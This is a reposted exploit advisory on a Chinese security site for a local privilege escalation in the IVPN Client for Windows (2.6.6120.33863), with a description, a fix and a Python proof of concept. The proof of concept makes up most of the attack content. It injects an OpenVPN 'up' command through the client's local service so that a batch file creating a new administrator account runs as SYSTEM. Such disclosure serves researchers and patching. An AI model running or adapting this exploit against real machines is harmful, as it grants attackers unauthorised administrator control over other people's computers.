首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IVPN Client 2.6.1 - Privilege Escalation 来源：https://security.szurek.pl/ 作者：Szurek 发布时间：2017-02-07   # Exploit IVPN Client for Windows 2.6.6120.33863 Privilege Escalation # Date: 06.02.2017 # Software Link: https://www.ivpn.net/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local   1. Description   It is possible to run `openvpn` as `SYSTEM` with custom openvpn.conf.   Using `--up cmd` we can execute any command.   https://security.szurek.pl/ivpn-client-for-windows-26612033863-privilege-escalation.html   2. Proof of Concept   import socket   print "IVPN Client for Windows 2.6.6120.33863 Privilege Escalation" print "by Kacper Szurek" print "http://security.szurek.pl/" print "https://twitter.com/KacperSzurek"   hostname = "is.gw.ivpn.net 2049" username = "your_username" password = "your_password"   open(r'c:\\1\\test.bat', 'w').write('net user hacked /add\nnet localgroup administrators hacked /add')   port = int(open(r"c:\Program Files\IVPN Client\etc\port.txt").read())   a = r'{"$type":"IVPN.OpenVPNServer, IVPN.Core","id":"id","region":"region","country":"country","city":"city","hostnames":{"$type":"System.Collections.Generic.List`1[[System.String, mscorlib]], mscorlib","$values":["'+hostname+r'\r\nup c:\\\\\\\\1\\\\\\\\test.bat\r\nverb"]},"ports":{"$type":"System.Collections.Generic.List`1[[IVPN.OpenVPNServerPort, IVPN.Core]], mscorlib","$values":[{"$type":"IVPN.OpenVPNServerPort, IVPN.Core","protocol":1,"port":2000}]}}'   b = r'{"$type":"IVPN.IVPNConnectRequest, IVPN.Core","entryServer":'+a+',"exitServer":'+a+',"username":"'+username+'","password":"'+password+'","portProtocol":{"$type":"IVPN.OpenVPNServerPort, IVPN.Core","protocol":1,"port":2000},"proxyType":"sth","proxyAddress":"proxyAddress","proxyPort":100,"proxyUsername":"proxyUsername","proxyPassword":"proxyPassword"}'   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1", port)) s.send(b)   print "OK"   3. Solution   Update to version 2.6.2   https://www.ivpn.net/setup/windows-changelog.html   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Debian 9 ntfs-3g - Privilege E ·OpenBSD HTTPd < 6.0 - Memory E ·Netwave IP Camera - Password D ·Zookeeper 3.5.2 - Denial of Se ·CUPS < 2.0.3 - Remote Command ·Zoom Player 12.7 / 13 Buffer O ·Cisco WebEx Chrome Extension R ·GNU / Bash v4.4 autocompletion ·TrueOnline / ZyXEL P660HN-T v2 ·Microsoft Office Word Maliciou ·TrueOnline / Billion 5200W-T R ·Apache OpenOffice Text Documen   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved